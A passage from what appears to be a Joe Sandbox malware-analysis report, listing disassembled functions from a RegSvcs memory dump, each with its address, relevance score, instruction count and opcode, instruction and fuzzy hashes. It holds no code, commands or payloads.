                                                              • Instruction ID: fb85fe095832ac08a465baebab75495ab4cba96992447acf10f48aea931d0bd8
                                                              • Opcode Fuzzy Hash: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
                                                              • Instruction Fuzzy Hash: 83D1C071A006079BDB18EF69C890ABE77F5FF94308F544629E916EF290E734E950CB60
                                                              Function 01618243 Relevance: .3, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: fc5bcf14e287fa5c9ccbfcd25cf61fb574695ad021e2e0eb0a9e3d972e0794df
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: 2CB19375A00605AFDB25DF99CD40EABBBBEFF84304F18845DAA0297798DB34E905CB50
                                                              Function 015A0535 Relevance: .3, Instructions: 300COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 5988b7d412e276c184cc3f547b391534933f4dfa8d8f6b3985983f7811b8dac2
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: 92B1F431610646AFDB25DBA8C850BBFBBF6BF88304F540559E6569F381EB30E941CB90
                                                              Function 015983C0 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2215dca57fd01bab1afac735b0cdd01bb6c7d366cad7f7676c08d6a35ba24822
                                                              • Instruction ID: 997466e09dbd316a1c05eedd5188cd5cf72195dbc253d9a33c9960b417c7a065
                                                              • Opcode Fuzzy Hash: 2215dca57fd01bab1afac735b0cdd01bb6c7d366cad7f7676c08d6a35ba24822
                                                              • Instruction Fuzzy Hash: 14C15870108345DFD764CF19C494BAEBBE5BF88304F44492DEA898B291E774E908CF92
                                                              Function 0158C427 Relevance: .3, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0ee7ca8997babccb47d3c08484442bd290823409bcd1edd68b04f5d518271d6f
                                                              • Instruction ID: a915ad3a8260706c1ee740c4da14b1311d581c41d5ddd0c5c5cf1c322ede678b
                                                              • Opcode Fuzzy Hash: 0ee7ca8997babccb47d3c08484442bd290823409bcd1edd68b04f5d518271d6f
                                                              • Instruction Fuzzy Hash: 34B15F70A002668BDB64DF68C890BADB7F5BF84704F0485E9D54AAB291EB709D85CB31
                                                              Function 015BE5E7 Relevance: .3, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7462e9d1da3f7e3dc399ca7db54b211c2fc135a1dc4a1d63bf9ef97e94e9b98
                                                              • Instruction ID: 7bb8b61ad608cfa97956a5e6a5e80baf9b33d2f5081a95fc7f4cbee4d3494d1b
                                                              • Opcode Fuzzy Hash: e7462e9d1da3f7e3dc399ca7db54b211c2fc135a1dc4a1d63bf9ef97e94e9b98
                                                              • Instruction Fuzzy Hash: DAA12632E00659AFEB21DF98C885BEEBBA4FB01754F08011AEB51AF691D7749D40CBD1
                                                              Function 015D0185 Relevance: .3, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c861fdefd95251dd21e52ddaf271468501957b57ec4b1a13c45917aeb1bfe42
                                                              • Instruction ID: 9eb3b467e5451931326c57747c8a4f6f21680dd06f31a85e91c1bc805d3f0cfd
                                                              • Opcode Fuzzy Hash: 7c861fdefd95251dd21e52ddaf271468501957b57ec4b1a13c45917aeb1bfe42
                                                              • Instruction Fuzzy Hash: 22A1A070B016169BEB35DF6DC990BBEB7A5FF54318F004529EA499B2C2DB34E811CB90
                                                              Function 01664500 Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0ebde36031e6193a6600d50071067d2a836674804275a6e2dc10b1c51708af59
                                                              • Instruction ID: a1e26bce7ff292a5555ecd5d4b62d3506767966d02f2a2a93c44558209bc88c2
                                                              • Opcode Fuzzy Hash: 0ebde36031e6193a6600d50071067d2a836674804275a6e2dc10b1c51708af59
                                                              • Instruction Fuzzy Hash: BEA1CB72A10252AFC721DF18CD80B6ABBE9FF88708F45462CE5899B750DB34EC51CB91
                                                              Function 016160E0 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc61b3cf30b873d4f8b2d33d21ba00ac69ff6ebd3e206e41f7c9b1252b912291
                                                              • Instruction ID: 67c053a95efe9f940cbef240a4db82e09531b9c84fe3ce866445e1385becd370
                                                              • Opcode Fuzzy Hash: dc61b3cf30b873d4f8b2d33d21ba00ac69ff6ebd3e206e41f7c9b1252b912291
                                                              • Instruction Fuzzy Hash: 4F91B075E00216AFDB15CFA8DC90BAEBFB5AF48710F194169E610EB355D7B4E9008BA0
                                                              Function 015AE3F0 Relevance: .3, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b614e2d22daded9cad21b1ca526c67bd3f0c481b269ac366245fb5a1f6245f5
                                                              • Instruction ID: 302bc20eb6c49223ba306611f52dd4a34523d91cc2a2986f3060c1d42b55ee7c
                                                              • Opcode Fuzzy Hash: 4b614e2d22daded9cad21b1ca526c67bd3f0c481b269ac366245fb5a1f6245f5
                                                              • Instruction Fuzzy Hash: 13914531A40616CBEB24EB58D841B7DBBE1FF88718F454469EA459F280E734D941CBA1
                                                              Function 015E6ACC Relevance: .2, Instructions: 226COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2ffa6eceb965f4adc5d09f9335d5bcc9d89c23a941f0fb8c1996bbda66c574c9
                                                              • Instruction ID: c9001a00a22348dfb1ec850edb1d8d2d847cc11427cc8d01fcc84618d5a140bb
                                                              • Opcode Fuzzy Hash: 2ffa6eceb965f4adc5d09f9335d5bcc9d89c23a941f0fb8c1996bbda66c574c9
                                                              • Instruction Fuzzy Hash: 1E81A3B1E006169FDB28CF69D944ABEBBF9FB58740F04852EE455EB640E334D940CBA4
                                                              Function 0165AB40 Relevance: .2, Instructions: 222COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                              • Instruction ID: b40d23d0d0803aa22e3b53c0ba26bfea274d82b14ec5c39e25c909f1151a8fae
                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                              • Instruction Fuzzy Hash: 80818272A0020A9FDF59DF99C890AAEBBF6BF84310F14866DDD169B345D734E901CB80
                                                              Function 015CE284 Relevance: .2, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc481bd4c3ad847ef393f849363d3352260b0c10ddea536a780e48f40d172f6f
                                                              • Instruction ID: bd799331de9b62a0bc526b83589ed09ed91e66794dc877677520e231f9199130
                                                              • Opcode Fuzzy Hash: fc481bd4c3ad847ef393f849363d3352260b0c10ddea536a780e48f40d172f6f
                                                              • Instruction Fuzzy Hash: 36816F71900609AFDB25CFA8C881AEEBBFAFF88714F10442DE556AB250D730BC05CB60
                                                              Function 015AC640 Relevance: .2, Instructions: 206COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be054406ea26d30714be694f340c1f01108f411f5d4ef41e0bb9462dfc626574
                                                              • Instruction ID: 3902a18e55884a585c1f1d776e2c341b2e56e28841043500019419fc54c684de
                                                              • Opcode Fuzzy Hash: be054406ea26d30714be694f340c1f01108f411f5d4ef41e0bb9462dfc626574
                                                              • Instruction Fuzzy Hash: AD71AC7590466ADBCB25CF58D8907BEBBB5FF48710F54455EEA42AF390E7309800CBA0
                                                              Function 01628D6B Relevance: .2, Instructions: 206COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f5934d91ffafdbf644e9dbb6fb409fbd42e1c2e49ac2ba616dfb0b636caa65f2
                                                              • Instruction ID: 594b57f9145173c6a2eb6a9ba778ff8612e55b7cca3c09766e9f4c16bb5276cb
                                                              • Opcode Fuzzy Hash: f5934d91ffafdbf644e9dbb6fb409fbd42e1c2e49ac2ba616dfb0b636caa65f2
                                                              • Instruction Fuzzy Hash: CF71AE709046669FCB15CF59CC40ABABBF9EF95304F048099E994DB342E335EA45CBA0
                                                              Function 016447A0 Relevance: .2, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08dcda320c258c20098fcc23aa0d64c7c1a91abeb3dc42c312cfbe2d9b2eec60
                                                              • Instruction ID: 877dd39eb1777ddc002b606f8dcf4715adcaf15e8fe82e7548cd1d5df92a06fe
                                                              • Opcode Fuzzy Hash: 08dcda320c258c20098fcc23aa0d64c7c1a91abeb3dc42c312cfbe2d9b2eec60
                                                              • Instruction Fuzzy Hash: 38719F71900205EFDB20DF99DE42B9EBBF9FF90300F10925AEA11AB359CB318981CB54
                                                              Function 015A260B Relevance: .2, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6520d66d1e502fb63f1b1331d8625322b8451e24c54e763e5b9376b0e4f75158
                                                              • Instruction ID: 5cf2add3a351b7ef2c9882148657276f5ed72f26978c1f315d62aaf2758a7c97
                                                              • Opcode Fuzzy Hash: 6520d66d1e502fb63f1b1331d8625322b8451e24c54e763e5b9376b0e4f75158
                                                              • Instruction Fuzzy Hash: 0871AC356446429FD312DF2CC481B6EBBE5FF88310F4485AAE8998F352EB34D946CB91
                                                              Function 0161035C Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction ID: 994230561d0bdc61ee508da366580cbf0a2593b2b261258b05267b84ee35dcb9
                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction Fuzzy Hash: E3715F71A0061AEFDB10DFA9C984EDEBBB9FF88704F144569E505EB250DB34EA41CB50
                                                              Function 016262A0 Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05eb5c077ee49f15f869fb2ac5dd881870f8ac78bf9d0a26c574ef0fc4f14a1c
                                                              • Instruction ID: 4b17f2815647a83835ae111b0509bfc63029153139f7c36e0ba182a27de0be3e
                                                              • Opcode Fuzzy Hash: 05eb5c077ee49f15f869fb2ac5dd881870f8ac78bf9d0a26c574ef0fc4f14a1c
                                                              • Instruction Fuzzy Hash: 24710432240B12AFE732CF18CC44F5ABBA6FF80714F148518EA968B2A0D770E945CF50
                                                              Function 01598AA0 Relevance: .2, Instructions: 197COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cac3a2a2b7bbc72608dea7692e7210bcf0e307f9578913ca2d84c5161f141819
                                                              • Instruction ID: 05b15358d765704b5c9b82f711a1d56fd327b25fb7cb88cb1e777fa9c1e1d16a
                                                              • Opcode Fuzzy Hash: cac3a2a2b7bbc72608dea7692e7210bcf0e307f9578913ca2d84c5161f141819
                                                              • Instruction Fuzzy Hash: F0817EB2A043169FDB24CF9CD884B6E7BB2BB89314F19522DDA00AF285C774DD41CB91
                                                              Function 01638350 Relevance: .2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52dce73e07561fa582ee4566d6345b9cdbec0a98fffbfc8a978ceb4821c7f2c5
                                                              • Instruction ID: 41367952c9d285b9ea57a1c49882e84d8330df38facb3cca438e576c257c5ced
                                                              • Opcode Fuzzy Hash: 52dce73e07561fa582ee4566d6345b9cdbec0a98fffbfc8a978ceb4821c7f2c5
                                                              • Instruction Fuzzy Hash: 1C519E70900705AFD721DF9AC880A9BFBFDBF94710F10471EE19657AA2C7B0A545CB50
                                                              Function 015CE443 Relevance: .2, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9eac073f052f112e2345eef6a231ee3a74ea5e4cba7f59fe675410860ec67c2
                                                              • Instruction ID: 8489e331530b539fe31faea3f8c7b32cfb97b0121994c35e6853b11f924de3a2
                                                              • Opcode Fuzzy Hash: e9eac073f052f112e2345eef6a231ee3a74ea5e4cba7f59fe675410860ec67c2
                                                              • Instruction Fuzzy Hash: 52518A71640A06EFCB22EFA9CD90E6AB7FAFF54744F40086DE5458B261D730E940CB50
                                                              Function 01634180 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3046d95dbee8bf34ed73a1dd13128374111d165c7b37641b840b45d1ec643cf0
                                                              • Instruction ID: cb2594d6a4f198d9dc9fdd0a0b7244f2f65669265c94097d6d6ab2db1df3888e
                                                              • Opcode Fuzzy Hash: 3046d95dbee8bf34ed73a1dd13128374111d165c7b37641b840b45d1ec643cf0
                                                              • Instruction Fuzzy Hash: A75134716083429FE754DF2AC881A6BBBE5BFC8208F444A2DF589C7350EB31D905CB96
                                                              Function 015B45B1 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                              • Instruction ID: fb74f9d717c8394142bbc1ca9311fc99bc2323091e3b3ccb8c08b1765ecb87ec
                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                              • Instruction Fuzzy Hash: B2517171E0021AABDF25DF98C480BEEBBB5BF49754F044069EA02AF241E774DD45CBA1
                                                              Function 0161E9E0 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                              • Instruction ID: 58ebc16b6ab002ce701c8a0d9c21950d2962a7b3bf60c140a1dbdea5345bbb82
                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                              • Instruction Fuzzy Hash: 75519371D0020AAFEF22DB94CD84BAEBB75BF40324F194669DD1267294D772DE418BA0
                                                              Function 01658B28 Relevance: .2, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e759f67711c740c914d0ebf696952b1f061adc4503914da3a10f1b65131104ad
                                                              • Instruction ID: 0c9ab1c7bf73f3b6f9a6581f282ec64d8745ce7d457e12db165f13e001ed30bd
                                                              • Opcode Fuzzy Hash: e759f67711c740c914d0ebf696952b1f061adc4503914da3a10f1b65131104ad
                                                              • Instruction Fuzzy Hash: C141D5717016129BDBA9DB2ECC94B7BBB9FEF90220F088219ED5587B81DB34D801C791
                                                              Function 0161CBF0 Relevance: .1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ae284829b2faa11f86d4b0ba7051a6807d4cdb1f0567a5adc0a6795d7ff4cf9
                                                              • Instruction ID: 6e3430c2707d4903f22fdaf27f21eb8bb778ac424a4c597e65e3420fa2d82af0
                                                              • Opcode Fuzzy Hash: 3ae284829b2faa11f86d4b0ba7051a6807d4cdb1f0567a5adc0a6795d7ff4cf9
                                                              • Instruction Fuzzy Hash: CA51CFB2D40216EFCB20DFA9CC90AAEBBB9FF88318B594519D505A7308D770ED41CB91
                                                              Function 015CA430 Relevance: .1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e90b32db1fd02cd428fcf1f0a2efad224194c731861ecb4356ce6bacf5d8a5c8
                                                              • Instruction ID: 0565ac5cca1e0866c780f7b20c54ec1ddf67c3e444f633ae7386e76d9b1b0be6
                                                              • Opcode Fuzzy Hash: e90b32db1fd02cd428fcf1f0a2efad224194c731861ecb4356ce6bacf5d8a5c8
                                                              • Instruction Fuzzy Hash: FF412771650216AFDB3AEFA8DCD1B3F7BA4FB94B08F00512CE9029F241E77198208B50
                                                              Function 0165A9D3 Relevance: .1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                              • Instruction ID: 1a193c25de2dd464e426fcd7bc7ac6255325654029dbc9391d6c4f40eb88c5ca
                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                              • Instruction Fuzzy Hash: 2641A2716007169FDB65CFA8CD84A6AB7A9FF84214F05862EED528B740EB30ED15C7D0
                                                              Function 015C01F8 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96b598a73bc7fa7f2df1366a313893c83593d3b7e8d5e8627af78f2ee4e4b3c0
                                                              • Instruction ID: 2c940082d8468f2f7b8beb955d044835a4d0be7c8e961434a925c685b587b3e8
                                                              • Opcode Fuzzy Hash: 96b598a73bc7fa7f2df1366a313893c83593d3b7e8d5e8627af78f2ee4e4b3c0
                                                              • Instruction Fuzzy Hash: 27418C3A90021ADFDB15DFD8C440AEEB7B5BF98A10F14815EF915EB280D7359D41CBA4
                                                              Function 015BEBFC Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7890c25bef7f5e9821932b9ef68a7ed862a86054d9a1b253aa0ff8b7b3bf5ff4
                                                              • Instruction ID: 7b39367b5e23eeaf1c20faf21765a7303f2d415bab5a25f33b7493635db0ba75
                                                              • Opcode Fuzzy Hash: 7890c25bef7f5e9821932b9ef68a7ed862a86054d9a1b253aa0ff8b7b3bf5ff4
                                                              • Instruction Fuzzy Hash: 8541E4722043029FD721DF28C886AAFB7E5FF88214F18492EE657CB651EB70E844CB51
                                                              Function 015D2750 Relevance: .1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                              • Instruction ID: 628b60dd38f38b0b505697f629be063f1885d16f92cb390192d0d6773de0ad7d
                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                              • Instruction Fuzzy Hash: 4B516C75A01215CFCB1ACF98C880AAEF7B2FF84750F1581A9D915E7391D770AE42CB90
                                                              Function 01596154 Relevance: .1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60393afba14e049b12507103a45d156843150894717b28434ec12c8c6b971a73
